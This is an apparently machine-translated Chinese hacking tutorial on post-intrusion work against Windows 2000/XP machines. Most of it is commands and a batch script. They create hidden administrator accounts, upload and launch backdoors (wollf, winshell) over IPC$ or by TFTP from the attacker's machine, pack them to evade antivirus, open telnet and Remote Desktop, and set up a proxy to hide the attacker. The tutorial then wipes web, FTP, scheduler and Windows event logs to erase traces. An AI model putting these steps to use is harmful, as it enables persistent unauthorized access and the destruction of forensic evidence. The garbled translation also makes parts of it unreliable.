Work after intrusion into windows

Work after system Intrusion
◇ 文/ heiyeluren

We know that intrusion into a system is sometimes relatively simple, but it is not that easy if we want to do a good job after the intrusion. The saying does not mean "it is easy to build a country and keep it secure, therefore, it is very important to intrude into a system and to do so carefully. from this perspective, this article will tell those who want to help them if you have obtained the permissions of a system.

Note: (if the system mentioned in this article is not specifically stated, it refers to the Windows2000/WindowsXP System)

 

1. obtain permissions (beyond the scope of the discussion, we will only discuss what to do after the system intrusion)

2. Create a super-authorized user
(1) create a user:
For example: Net user system $ hacker/Add
Net localgroup administrators system $/Add
Note: The preceding two commands are used to create a super-authorized user named "system $" and whose password is "hacker ".
(2) clone a Super User:
You can use the CA tool to achieve super-user's Kelon, provided that you have the account and password as long as you have the administrator privilege of the target system.
Ca // ip administrator password iusr_name Password
Description: Administrator-Administrator account password
Iusr_name -- User Password with lower permissions already exists in the system -- clone User Password
CCA: tool for checking clone results.
CCA // ip User Password
User: Cloned account
Password: Password

3. Create a backdoor
(1) Upload a backdoor program (there are many methods, only two of which are commonly used ):
To upload backdoors, such as wollf, winshell, and other common backdoors, you are advised to add a backdoor shell, such as UPX or ASPack, so it is not easy to be scanned and killed by the virus firewall.

How to upload a backdoor:
(A) Use IPC $: to establish a connection with the other party first:
Net use // peer IP Address/IPC $ "password"/User: "User Name"
After the webshell is created, you can upload the webshell:
Copy C:/hack/wollf.exe // ip/ADMIN $
Note: transfer the wollf backdoor under your drive C to the X:/winnt of the target party, or to the Windows directory.
(B) Using TFTP: The premise is that you have entered the system of the other party. For example, if you have entered the system of the other Party through telnet
You can send backdoors to the other party's system from your machine in the other party's shell:
TFTP-I your IP get wollf.exe
Note: To download wollf.exe from your machine to the system directory of the other party, the premise is that the other party does not prohibit TFTP and you have an independent IP address (the LAN machine does not work). Open the FTP tool tftpd32 on your own machine, it will listen to your connection to port 69, and then you can download your machine from the other machine.

(2) run the backdoor:
(A) Use the AT command:
First obtain the Time of the Peer System: Net time // The peer IP Address
At command: At // path of the system in which the backdoor of the other party's IP address is run
Example: At // 192.168.0.1 C:/winnt/system32/wollf.exe
Note: You need to execute the AT command on the premise that you have established an IPC $ connection with the other party, and after obtaining the Time of the other party's system, you need to run the backdoor in a few minutes. After using the atcommand, you can also use the tool named "xec.exe" to implement.
(B) Using "streamer" to copy and run backdoors, you can refer to the "streamer" Help file.
(C) directly run the backdoor:
For example, you have logged on to the system of the other party. For example, you can run the system directly after entering the system of the other party using telnet.
If the other party does not enable telnet, we can enable it.
How to enable telnet for the other party:
You can use the opentelnet.exe tool to achieve this, provided that you have the Administrator permission for the target system and have enabled IPC $,
The command is as follows:
Opentelnet // ip Username Password ntlmauthor telnetport
Note: // ip -- target IP username -- User Name password -- Password
Ntlmauthor -- NTLM authentication method telnetport -- Port
Verification Methods: 0: indicates that NTLM verification is not used. 1: indicates that NTLM verification is attempted first. If the verification fails, the password is used for verification. 2: Only NTLM verification is used.
After successful execution, you can use Telnet to the IP port of the other party or NC-VV to log on to the target machine.

4. Act as a proxy server
I don't need to say why I want to act as a proxy. Let's talk about how to act as a proxy.
Skserver.exe is a proxy tool written by snake. It is a good stepping stone!
First, write a batch. The content is as follows:
@ Echo ************************************** *********
@ ECHO: Batch Processing of socket Agent installation
@ Echo by heiyeluren
@ Echo cqsn --- http://www.hackerxfiles.com/
@ Echo ************************************** *********
@ Pause
@ Skserver-install
@ Echo install... succeed!
@ Skserver-config port 1983
@ Echo set port in 1983... succeed!
@ Skserver-config starttype 2
@ Echo set starttype is autostart... succeed!
@ Net start skserver
@ Echo start service... succeed!
@ Echo OK... install end!
@ Pause
@ Exit

You can change the above batch processing as needed. The skserver can be changed to the backdoor name, but the following "Net start skserver" cannot be changed. This is the service name of the tool. You can also change it to your own. After passing skserver.exe to the other system, run the batch to connect to the Proxy from the port 1983 of the other party. You can use sockcap to act as the proxy server. You can jump to the layer 254 to see who can find you ~~~

5. Start a Super Terminal
If the other party is a system of Win2000 Server or above, you can open the Super Terminal of the other party to provide better remote control. We all say that 3389 bots are the best. Now let's try it! ~~

(1) Manually open the terminal:
After entering the target system, enter the following content in the command prompt: (Suppose the system is under C:/WINNT)
Echo [components]> C:/3389
Echo tsenable = on> C:/3389
Sysocmgr/I: C:/winnt/INF/sysoc. inf/u: C:/3389/Q
(You can add the parameter/R to suppress restart and restart after installation.) or you can write this file and upload it to the other system:
[Components]
Tsenable = on
Save as the 3389 file and run sysocmgr/I: C:/winnt/INF/sysoc. INF/u: C:/3389/Q. After the other party restarts, you will have a 3389 zombie, and you can connect to the other Party through "Remote Desktop Connection, control the recipient from windows.

(2) Tools used:
This uses a tool called dixyxs.exe to open the terminal of the other party.
Upload the tool to the other party's system, and then execute the program: dixyxs.exe. After a while, the zombie will automatically restart and the terminal service will appear after the restart.

6. Clear logs
After all this is done, do you not want to be checked in three minutes? Logs should be cleared.
Windows logs include www logs, FTP logs, DNS logs, security logs, system logs, and application logs.

(1) manually clear logs:
Some logs must be deleted, such as web and FTP logs.

Default Log File Location:
Default location of application logs, security logs, system logs, and DNS logs: % SystemRoot %/system32
/Config. The default file size is kb, Which is changed by the Administrator.
Security log file: % SystemRoot %/system32/config/secevent. EVT
System log file: % SystemRoot %/system32/config/sysevent. EVT
Application Log File: % SystemRoot %/system32/config/appevent. EVT
Default location of FTP logs for IIS: % SystemRoot %/system32/logfiles/msftpsvc1/. One log is generated every day by default.
The default location of iis www logs is % SystemRoot %/system32/logfiles/w3svc1/. One log is generated every day by default.
Default location of schedroot service logs: % SystemRoot %/schedlgu.txt

We can delete the service after it is stopped:
Stop Service: net stop w3svc
Then several logs can be deleted. The WWW Service logs are in the C:/winnt/system32/logfiles/w3svc1 directory; the FTP service logs are in the C: /winnt/system32/logfiles/msftpsvc1 directory. then you can use DEL:
Del C:/winnt/system32/logfiles/w3svc1/*. */Q
Del C:/winnt/system32/logfiles/msftpsvc1/*. */Q
Then there is the scheduler log to stop the service: net stop "Task Scheduler"
Then del C:/winnt/schedlgu.txt/Q ~

The associated services such as security logs, system logs, and application logs are eventlogs, which cannot be stopped. Therefore, if you manually delete these logs, you must use a very slow method:
Open the "Event Viewer" in "Administrative Tools" in "Control Panel", and in the "operations" menu, there is a menu named "connect to another computer". Click it, as shown in: enter the IP address of the remote computer, wait for a while (based on the network speed of both parties), and then open the "Event Viewer" of the other computer: Select the "Security" log of the remote computer, right-click its properties and click "Clear log" in the properties. OK! Security log cleared! Clear the "System" log and "application" log in the same way!

(2) use tools to delete logs
Using Tools to delete those logs is much easier!
(A)delete wwwlogs and ftplogs related to iisservice, you can use the cleaniislog.exe tool.
Usage:
First use the IPC $ pipeline to connect: net use // ip/IPC $ "password"/User :""
Then you can use the following command:
Cleaniislog [logfile] | [.] [cleanip] |.
Indicates the log file to be cleared. It indicates the IP address record in all the logs to be cleared. It indicates all IP address records.
Example: cleaniislog. 127.0.0.1
A. You can clear the specified IP address connection record and keep other IP address records.
B. After clearing, cleaniislog clears its running records in the system log.
Usage: cleaniislog <logfile >|<.> <cleanip >|<.>
<Logfile>: Specifies the log file to be processed. If it is specified as ".", all log files are processed. Note: it takes a long time to process all log files ).
<Cleanip>: Specifies the IP record to be cleared. If it is set to ".", all IP records are cleared (this is not recommended ).
Cleaniislog can only be run locally and must have the administrators permission.

(BITS Delete security logs, system logs, and application logs. You can use the elsave.exe tool.
Usage:
First use the IPC $ pipeline to connect: net use // ip/IPC $ "password"/User :""
Clear the application logs of the target system:
Elsave-S // ip-L "application"-C
Clear system logs of the target system:
Elsave-S // ip-L "system" "-C
Clear the security logs of the target system:
Elsave-S // ip-L "security"-C

(C‑logkiller.exe this tool can delete all the logs of the other party, including "application logs", "security logs" and "system logs", iis ftp services, the SMTP Service Log of IIS, the WWW Service Log of IIS, and the scheduled task log.
Usage: Upload the tool to the other party's system and run it directly.
Example: C:/winnt/system32/logkiller.exe

7. What follows

Speaking of this, the work that should be done after a system intrusion is almost done. of course, you can also do other jobs, instead of following the above pattern, but the above is a relatively common pattern. for example, you can also set up remote control software such as VNC or make the zombie into your FTP server. But the premise is that you must pay attention to security and do not leave unnecessary traces.
I don't know if you have found any situation, that is, we all use a variety of tools to complete our tasks, so we can't give up, but if we use too many tools, there is not much progress in our technology, so we hope that you will not use it without using tools. For example, if you can use manual tools, try to do it manually. In this way, you will "know it, even better, "isn't it good?
I may be talking about some old things in this article, and many experts may not want to read them. Heheh, I think this positioning is at the food level, this helps you not to be confused about these small issues.

Statement: The above is purely a technology of discussion. If any organization or individual violates national laws by using the above methods, it will be subject to criminal law sanction and all actions of the organization or individual are irrelevant to the author.